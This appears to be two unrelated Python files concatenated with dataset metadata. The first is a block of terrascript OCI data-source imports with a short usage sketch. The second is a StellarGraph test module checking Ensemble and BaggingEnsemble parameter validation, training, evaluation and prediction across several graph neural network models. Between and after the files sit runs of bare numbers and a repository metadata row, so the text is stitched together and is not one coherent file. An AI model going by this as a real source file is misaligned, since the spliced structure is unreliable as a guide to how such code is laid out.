from terrascript.data.hashicorp.oci import oci_objectstorage_bucket
from terrascript.data.hashicorp.oci import oci_objectstorage_bucket_summaries
from terrascript.data.hashicorp.oci import oci_objectstorage_namespace
from terrascript.data.hashicorp.oci import oci_objectstorage_namespace_metadata
from terrascript.data.hashicorp.oci import oci_objectstorage_object
from terrascript.data.hashicorp.oci import oci_objectstorage_object_head
from terrascript.data.hashicorp.oci import oci_objectstorage_object_lifecycle_policy
from terrascript.data.hashicorp.oci import oci_objectstorage_object_versions
from terrascript.data.hashicorp.oci import oci_objectstorage_objects
from terrascript.data.hashicorp.oci import oci_objectstorage_preauthrequest
from terrascript.data.hashicorp.oci import oci_objectstorage_preauthrequests
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_policies
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_policy
from terrascript.data.hashicorp.oci import oci_objectstorage_replication_sources
from terrascript.data.hashicorp.oci import oci_oce_oce_instance
from terrascript.data.hashicorp.oci import oci_oce_oce_instances
from terrascript.data.hashicorp.oci import oci_ocvp_esxi_host
from terrascript.data.hashicorp.oci import oci_ocvp_esxi_hosts
from terrascript.data.hashicorp.oci import oci_ocvp_sddc
from terrascript.data.hashicorp.oci import oci_ocvp_sddcs
from terrascript.data.hashicorp.oci import oci_ocvp_supported_skus
from terrascript.data.hashicorp.oci import (
oci_ocvp_supported_vmware_software_versions,
)
from terrascript.data.hashicorp.oci import oci_oda_oda_instance
from terrascript.data.hashicorp.oci import oci_oda_oda_instances
from terrascript.data.hashicorp.oci import oci_ons_notification_topic
from terrascript.data.hashicorp.oci import oci_ons_notification_topics
from terrascript.data.hashicorp.oci import oci_ons_subscription
from terrascript.data.hashicorp.oci import oci_ons_subscriptions
from terrascript.data.hashicorp.oci import oci_opsi_database_insight
from terrascript.data.hashicorp.oci import oci_opsi_database_insights
from terrascript.data.hashicorp.oci import oci_opsi_enterprise_manager_bridge
from terrascript.data.hashicorp.oci import oci_opsi_enterprise_manager_bridges
from terrascript.data.hashicorp.oci import oci_opsi_host_insight
from terrascript.data.hashicorp.oci import oci_opsi_host_insights
from terrascript.data.hashicorp.oci import oci_optimizer_categories
from terrascript.data.hashicorp.oci import oci_optimizer_category
from terrascript.data.hashicorp.oci import oci_optimizer_enrollment_status
from terrascript.data.hashicorp.oci import oci_optimizer_enrollment_statuses
from terrascript.data.hashicorp.oci import oci_optimizer_histories
from terrascript.data.hashicorp.oci import oci_optimizer_profile
from terrascript.data.hashicorp.oci import oci_optimizer_profiles
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation_strategies
from terrascript.data.hashicorp.oci import oci_optimizer_recommendation_strategy
from terrascript.data.hashicorp.oci import oci_optimizer_recommendations
from terrascript.data.hashicorp.oci import oci_optimizer_resource_action
from terrascript.data.hashicorp.oci import oci_optimizer_resource_actions
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance
from terrascript.data.hashicorp.oci import (
oci_osmanagement_managed_instance_event_report,
)
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance_group
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instance_groups
from terrascript.data.hashicorp.oci import oci_osmanagement_managed_instances
from terrascript.data.hashicorp.oci import oci_osmanagement_software_source
from terrascript.data.hashicorp.oci import oci_osmanagement_software_sources
from terrascript.data.hashicorp.oci import oci_resourcemanager_stack
from terrascript.data.hashicorp.oci import oci_resourcemanager_stack_tf_state
from terrascript.data.hashicorp.oci import oci_resourcemanager_stacks
from terrascript.data.hashicorp.oci import oci_sch_service_connector
from terrascript.data.hashicorp.oci import oci_sch_service_connectors
from terrascript.data.hashicorp.oci import oci_service_catalog_private_application
from terrascript.data.hashicorp.oci import (
oci_service_catalog_private_application_package,
)
from terrascript.data.hashicorp.oci import (
oci_service_catalog_private_application_packages,
)
from terrascript.data.hashicorp.oci import oci_service_catalog_private_applications
from terrascript.data.hashicorp.oci import oci_service_catalog_service_catalog
from terrascript.data.hashicorp.oci import (
oci_service_catalog_service_catalog_association,
)
from terrascript.data.hashicorp.oci import (
oci_service_catalog_service_catalog_associations,
)
from terrascript.data.hashicorp.oci import oci_service_catalog_service_catalogs
from terrascript.data.hashicorp.oci import oci_streaming_connect_harness
from terrascript.data.hashicorp.oci import oci_streaming_connect_harnesses
from terrascript.data.hashicorp.oci import oci_streaming_stream
from terrascript.data.hashicorp.oci import oci_streaming_stream_pool
from terrascript.data.hashicorp.oci import oci_streaming_stream_pools
from terrascript.data.hashicorp.oci import oci_streaming_streams
from terrascript.data.hashicorp.oci import oci_vault_secret
from terrascript.data.hashicorp.oci import oci_vault_secret_version
from terrascript.data.hashicorp.oci import oci_vault_secrets
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipe,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_recipes,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_target,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_container_scan_targets,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipe,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_recipes,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_target,
)
from terrascript.data.hashicorp.oci import (
oci_vulnerability_scanning_host_scan_targets,
)
from terrascript.data.hashicorp.oci import oci_waas_address_list
from terrascript.data.hashicorp.oci import oci_waas_address_lists
from terrascript.data.hashicorp.oci import oci_waas_certificate
from terrascript.data.hashicorp.oci import oci_waas_certificates
from terrascript.data.hashicorp.oci import oci_waas_custom_protection_rule
from terrascript.data.hashicorp.oci import oci_waas_custom_protection_rules
from terrascript.data.hashicorp.oci import oci_waas_edge_subnets
from terrascript.data.hashicorp.oci import oci_waas_http_redirect
from terrascript.data.hashicorp.oci import oci_waas_http_redirects
from terrascript.data.hashicorp.oci import oci_waas_protection_rule
from terrascript.data.hashicorp.oci import oci_waas_protection_rules
from terrascript.data.hashicorp.oci import oci_waas_waas_policies
from terrascript.data.hashicorp.oci import oci_waas_waas_policy
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.oci
#
# t = terrascript.provider.hashicorp.oci.oci()
# s = str(t)
#
# assert 'https://github.com/terraform-providers/terraform-provider-oci' in s
# assert '4.45.0' in s
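# --- Hedged usage sketch (not part of the generated test above) --------------
# Illustrates how one of the OCI data sources imported above might be attached
# to a Terrascript configuration. Assumes the usual python-terrascript API
# (a `Terrascript` container accepting blocks via `+=`, data-source classes
# taking a label plus keyword arguments, and `str()` rendering the Terraform
# JSON); the compartment OCID is a placeholder, not a real value.
def example_oci_data_source_config():
    import terrascript

    config = terrascript.Terrascript()
    # Look up the Object Storage namespace of a (placeholder) compartment.
    config += oci_objectstorage_namespace(
        "ns", compartment_id="ocid1.compartment.oc1..example"
    )
    return str(config)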
| 35.722625
| 88
| 0.822283
| 10,589
| 83,841
| 6.180565
| 0.05534
| 0.184457
| 0.275586
| 0.321517
| 0.972603
| 0.971473
| 0.970006
| 0.965132
| 0.804877
| 0.474574
| 0
| 0.000262
| 0.13534
| 83,841
| 2,346
| 89
| 35.737852
| 0.902516
| 0.005892
| 0
| 0.150302
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000426
| 0
| 1
| 0.002266
| true
| 0.003021
| 0.761329
| 0
| 0.763595
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
fe238b20f267105ef10d7964c5c579d90a332646
| 28,305
|
py
|
Python
|
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
tests/utils/test_ensemble.py
|
zblumen/stellargraph
|
10e62006907dd5968286f33648d1054e9c961c1b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018-2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import networkx as nx
import numpy as np
import tensorflow as tf
from stellargraph import StellarGraph
from stellargraph.layer import (
GraphSAGE,
GCN,
GAT,
HinSAGE,
link_classification,
link_regression,
)
from stellargraph.mapper import (
GraphSAGENodeGenerator,
FullBatchNodeGenerator,
HinSAGENodeGenerator,
GraphSAGELinkGenerator,
HinSAGELinkGenerator,
)
from stellargraph.utils import Ensemble, BaggingEnsemble
from tensorflow.keras import layers, Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import categorical_crossentropy, binary_crossentropy
# FIXME (#535): Consider using graph fixtures
def example_graph_1(feature_size=None):
G = nx.Graph()
elist = [(1, 2), (2, 3), (1, 4), (3, 2), (5, 6), (1, 5)]
G.add_nodes_from([1, 2, 3, 4, 5, 6], label="default")
G.add_edges_from(elist, label="default")
# Add example features
if feature_size is not None:
for v in G.nodes():
G.nodes[v]["feature"] = np.ones(feature_size)
return StellarGraph(G, node_features="feature")
else:
return StellarGraph(G)
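# Hedged sketch of the fixture approach suggested by the FIXME above; the
# fixture name below is hypothetical and none of the tests are wired to use
# it yet. feature_size=10 matches the value most tests in this module pass.
@pytest.fixture
def example_graph():
    return example_graph_1(feature_size=10)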
def create_graphSAGE_model(graph, link_prediction=False):
if link_prediction:
# We are going to train on the original graph
generator = GraphSAGELinkGenerator(graph, batch_size=2, num_samples=[2, 2])
edge_ids_train = np.array([[1, 2], [2, 3], [1, 3]])
train_gen = generator.flow(edge_ids_train, np.array([1, 1, 0]))
else:
generator = GraphSAGENodeGenerator(graph, batch_size=2, num_samples=[2, 2])
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GraphSAGE(
layer_sizes=[8, 8], generator=generator, bias=True, dropout=0.5
)
if link_prediction:
# Expose input and output sockets of graphsage, for source and destination nodes:
x_inp_src, x_out_src = base_model.node_model()
x_inp_dst, x_out_dst = base_model.node_model()
# re-pack into a list where (source, destination) inputs alternate, for link inputs:
x_inp = [x for ab in zip(x_inp_src, x_inp_dst) for x in ab]
# same for outputs:
x_out = [x_out_src, x_out_dst]
prediction = link_classification(
output_dim=1, output_act="relu", edge_embedding_method="ip"
)(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
else:
x_inp, x_out = base_model.node_model()
prediction = layers.Dense(units=2, activation="softmax")(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
return base_model, keras_model, generator, train_gen
def create_HinSAGE_model(graph, link_prediction=False):
if link_prediction:
generator = HinSAGELinkGenerator(
graph,
batch_size=2,
num_samples=[2, 1],
head_node_types=["default", "default"],
)
edge_ids_train = np.array([[1, 2], [2, 3], [1, 3]])
train_gen = generator.flow(edge_ids_train, np.array([1, 1, 0]))
else:
generator = HinSAGENodeGenerator(
graph, batch_size=2, num_samples=[2, 2], head_node_type="default"
)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = HinSAGE(
layer_sizes=[8, 8], generator=generator, bias=True, dropout=0.5
)
if link_prediction:
# Define input and output sockets of hinsage:
x_inp, x_out = base_model.build()
# Final estimator layer
prediction = link_regression(edge_embedding_method="ip")(x_out)
else:
x_inp, x_out = base_model.build()
prediction = layers.Dense(units=2, activation="softmax")(x_out)
keras_model = Model(inputs=x_inp, outputs=prediction)
return base_model, keras_model, generator, train_gen
def create_GCN_model(graph):
generator = FullBatchNodeGenerator(graph)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GCN(
layer_sizes=[8, 2],
generator=generator,
bias=True,
dropout=0.5,
activations=["elu", "softmax"],
)
x_inp, x_out = base_model.node_model()
keras_model = Model(inputs=x_inp, outputs=x_out)
return base_model, keras_model, generator, train_gen
def create_GAT_model(graph):
generator = FullBatchNodeGenerator(graph, sparse=False)
train_gen = generator.flow([1, 2], np.array([[1, 0], [0, 1]]))
base_model = GAT(
layer_sizes=[8, 8, 2],
generator=generator,
bias=True,
in_dropout=0.5,
attn_dropout=0.5,
activations=["elu", "elu", "softmax"],
normalize=None,
)
x_inp, x_out = base_model.node_model()
keras_model = Model(inputs=x_inp, outputs=x_out)
return base_model, keras_model, generator, train_gen
#
# Test for Ensemble instance creation with invalid parameters.
#
def test_ensemble_init_parameters():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
base_model, keras_model, generator, train_gen = create_graphSAGE_model(graph)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
base_model = gnn_model[0]
keras_model = gnn_model[1]
# Test mixed types
with pytest.raises(ValueError):
Ensemble(base_model, n_estimators=3, n_predictions=3)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=0)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=-3)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=1, n_predictions=1.7)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=0, n_predictions=11)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=-8, n_predictions=11)
with pytest.raises(ValueError):
Ensemble(keras_model, n_estimators=2.5, n_predictions=11)
ens = Ensemble(keras_model, n_estimators=7, n_predictions=10)
assert len(ens.models) == 7
assert ens.n_estimators == 7
assert ens.n_predictions == 10
#
# Repeat for BaggingEnsemble
# Test mixed types
with pytest.raises(ValueError):
BaggingEnsemble(base_model, n_estimators=3, n_predictions=3)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=0)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=-3)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=1, n_predictions=1.7)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=0, n_predictions=11)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=-8, n_predictions=11)
with pytest.raises(ValueError):
BaggingEnsemble(keras_model, n_estimators=2.5, n_predictions=11)
ens = BaggingEnsemble(keras_model, n_estimators=7, n_predictions=10)
assert len(ens.models) == 7
assert ens.n_estimators == 7
assert ens.n_predictions == 10
def test_compile():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=5)
        # These errors are actually raised by Keras, but a check is added here just to make sure.
with pytest.raises(ValueError):
ens.compile(optimizer=Adam(), loss=None, weighted_metrics=["acc"])
with pytest.raises(ValueError): # must specify the optimizer to use
ens.compile(
optimizer=None, loss=categorical_crossentropy, weighted_metrics=["acc"]
)
with pytest.raises(
ValueError
): # The metric is made up so it should raise ValueError
ens.compile(
optimizer=Adam(),
loss=categorical_crossentropy,
weighted_metrics=["f1_accuracy"],
)
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=5)
        # These errors are actually raised by Keras, but a check is added here just to make sure.
with pytest.raises(ValueError):
ens.compile(optimizer=Adam(), loss=None, weighted_metrics=["acc"])
with pytest.raises(ValueError): # must specify the optimizer to use
ens.compile(
optimizer=None, loss=categorical_crossentropy, weighted_metrics=["acc"]
)
with pytest.raises(
ValueError
): # The metric is made up so it should raise ValueError
ens.compile(
optimizer=Adam(),
loss=categorical_crossentropy,
weighted_metrics=["f1_accuracy"],
)
def test_Ensemble_fit_generator():
tf.keras.backend.clear_session()
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
train_gen = gnn_model[3]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
ens.fit_generator(train_gen, epochs=1, verbose=0, shuffle=False)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator, # wrong type
epochs=10,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
def test_BaggingEnsemble_fit_generator():
tf.keras.backend.clear_session()
train_data = np.array([1, 2])
train_targets = np.array([[1, 0], [0, 1]])
graph = example_graph_1(feature_size=10)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
train_gen = gnn_model[3]
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=1,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
        # This is a BaggingEnsemble, so the generator in the call below is of the wrong type.
with pytest.raises(ValueError):
ens.fit_generator(
train_gen,
train_data=train_data,
train_targets=train_targets,
epochs=10,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=None, # Should not be None
epochs=10,
validation_data=train_gen,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=None,
train_targets=None,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
bag_size=-1, # should be positive integer smaller than or equal to len(train_data) or None
)
with pytest.raises(ValueError):
ens.fit_generator(
generator=generator,
train_data=train_data,
train_targets=train_targets,
epochs=10,
validation_data=None,
verbose=0,
shuffle=False,
bag_size=10, # larger than the number of training points
)
def test_evaluate_generator():
tf.keras.backend.clear_session()
test_data = np.array([3, 4, 5])
test_targets = np.array([[1, 0], [0, 1], [0, 1]])
graph = example_graph_1(feature_size=5)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator, test_data=test_data, test_targets=test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=test_data,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(test_data, test_targets),
test_data=test_data,
test_targets=test_targets,
)
        # We won't train the model; instead, we use the initial random weights to
        # test the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(test_data, test_targets)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator, test_data=test_data, test_targets=test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=test_data,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(test_data, test_targets),
test_data=test_data,
test_targets=test_targets,
)
        # We won't train the model; instead, we use the initial random weights to
        # test the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(test_data, test_targets)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
def test_predict_generator():
tf.keras.backend.clear_session()
# test_data = np.array([[0, 0], [1, 1], [0.8, 0.8]])
test_data = np.array([4, 5, 6])
test_targets = np.array([[1, 0], [0, 1], [0, 1]])
graph = example_graph_1(feature_size=2)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph),
create_HinSAGE_model(graph),
create_GCN_model(graph),
create_GAT_model(graph),
]
for i, gnn_model in enumerate(gnn_models):
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=2)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(test_data)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=test_data)
        # We won't train the model; instead, we use the initial random weights to
        # test the predict_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
if i > 1:
# GAT and GCN are full batch so the batch dimension is 1
assert len(test_predictions) == 1
assert test_predictions.shape[1] == test_targets.shape[0]
else:
assert len(test_predictions) == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
if i > 1:
assert test_predictions.shape[2] == 1
else:
assert test_predictions.shape[2] == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=2)
ens.compile(
optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(test_data)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=test_data)
        # We won't train the model; instead, we use the initial random weights to
        # test the predict_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
if i > 1:
# GAT and GCN are full batch so the batch dimension is 1
assert len(test_predictions) == 1
assert test_predictions.shape[1] == test_targets.shape[0]
else:
assert len(test_predictions) == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
if i > 1:
assert test_predictions.shape[2] == 1
else:
assert test_predictions.shape[2] == len(test_data)
assert test_predictions.shape[-1] == test_targets.shape[-1]
#
# Tests for link prediction that can't be combined easily with the node attribute inference workflow above.
#
def test_evaluate_generator_link_prediction():
tf.keras.backend.clear_session()
edge_ids_test = np.array([[1, 2], [2, 3], [1, 3]])
edge_labels_test = np.array([1, 1, 0])
graph = example_graph_1(feature_size=4)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_labels_test,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(edge_ids_test, edge_labels_test),
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
        # We won't train the model; instead, we use the initial random weights to
        # test the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(edge_ids_test, edge_labels_test)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator,
test_data=edge_labels_test,
test_targets=None, # must give test_targets
)
with pytest.raises(ValueError):
ens.evaluate_generator(
generator=generator.flow(edge_ids_test, edge_labels_test),
test_data=edge_ids_test,
test_targets=edge_labels_test,
)
        # We won't train the model; instead, we use the initial random weights to
        # test the evaluate_generator method.
test_metrics_mean, test_metrics_std = ens.evaluate_generator(
generator.flow(edge_ids_test, edge_labels_test)
)
assert len(test_metrics_mean) == len(test_metrics_std)
assert len(test_metrics_mean.shape) == 1
assert len(test_metrics_std.shape) == 1
def test_predict_generator_link_prediction():
tf.keras.backend.clear_session()
edge_ids_test = np.array([[1, 2], [2, 3], [1, 3]])
graph = example_graph_1(feature_size=2)
# base_model, keras_model, generator, train_gen
gnn_models = [
create_graphSAGE_model(graph, link_prediction=True),
create_HinSAGE_model(graph, link_prediction=True),
]
for gnn_model in gnn_models:
keras_model = gnn_model[1]
generator = gnn_model[2]
ens = Ensemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(edge_ids_test)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=edge_ids_test)
        # We won't train the model; instead, we use the initial random weights to
        # test the predict_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
assert len(test_predictions) == len(edge_ids_test)
assert test_predictions.shape[1] == 1
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
assert test_predictions.shape[2] == len(edge_ids_test)
assert test_predictions.shape[3] == 1
#
# Repeat for BaggingEnsemble
ens = BaggingEnsemble(keras_model, n_estimators=2, n_predictions=1)
ens.compile(
optimizer=Adam(), loss=binary_crossentropy, weighted_metrics=["acc"]
)
test_gen = generator.flow(edge_ids_test)
# Check that passing invalid parameters is handled correctly. We will not check error handling for those
# parameters that Keras will be responsible for.
with pytest.raises(ValueError):
ens.predict_generator(generator=test_gen, predict_data=edge_ids_test)
        # We won't train the model; instead, we use the initial random weights to
        # test the predict_generator method.
test_predictions = ens.predict_generator(test_gen, summarise=True)
print("test_predictions shape {}".format(test_predictions.shape))
assert len(test_predictions) == len(edge_ids_test)
assert test_predictions.shape[1] == 1
test_predictions = ens.predict_generator(test_gen, summarise=False)
assert test_predictions.shape[0] == ens.n_estimators
assert test_predictions.shape[1] == ens.n_predictions
assert test_predictions.shape[2] == len(edge_ids_test)
assert test_predictions.shape[3] == 1
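# --- Hedged usage sketch (not part of the original tests) --------------------
# End-to-end flow pieced together from the API exercised above: build a base
# model, wrap its Keras model in an Ensemble, compile, train briefly, and take
# the summarised (mean) prediction. All names come from this module's imports
# and helpers; the hyperparameters are illustrative only.
def example_ensemble_workflow():
    graph = example_graph_1(feature_size=10)
    base_model, keras_model, generator, train_gen = create_graphSAGE_model(graph)
    ens = Ensemble(keras_model, n_estimators=3, n_predictions=5)
    ens.compile(
        optimizer=Adam(), loss=categorical_crossentropy, weighted_metrics=["acc"]
    )
    ens.fit_generator(train_gen, epochs=5, verbose=0, shuffle=False)
    # Mean prediction over estimators and repeated predictions for two nodes.
    return ens.predict_generator(generator.flow([1, 2]), summarise=True)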
| 34.309091
| 112
| 0.636531
| 3,447
| 28,305
| 4.994778
| 0.089643
| 0.030203
| 0.039031
| 0.063426
| 0.853923
| 0.83766
| 0.828948
| 0.811523
| 0.797526
| 0.794041
| 0
| 0.017863
| 0.274157
| 28,305
| 824
| 113
| 34.350728
| 0.820151
| 0.166543
| 0
| 0.701818
| 0
| 0
| 0.010987
| 0
| 0
| 0
| 0
| 0.001214
| 0.087273
| 1
| 0.023636
| false
| 0
| 0.02
| 0
| 0.054545
| 0.007273
| 0
| 0
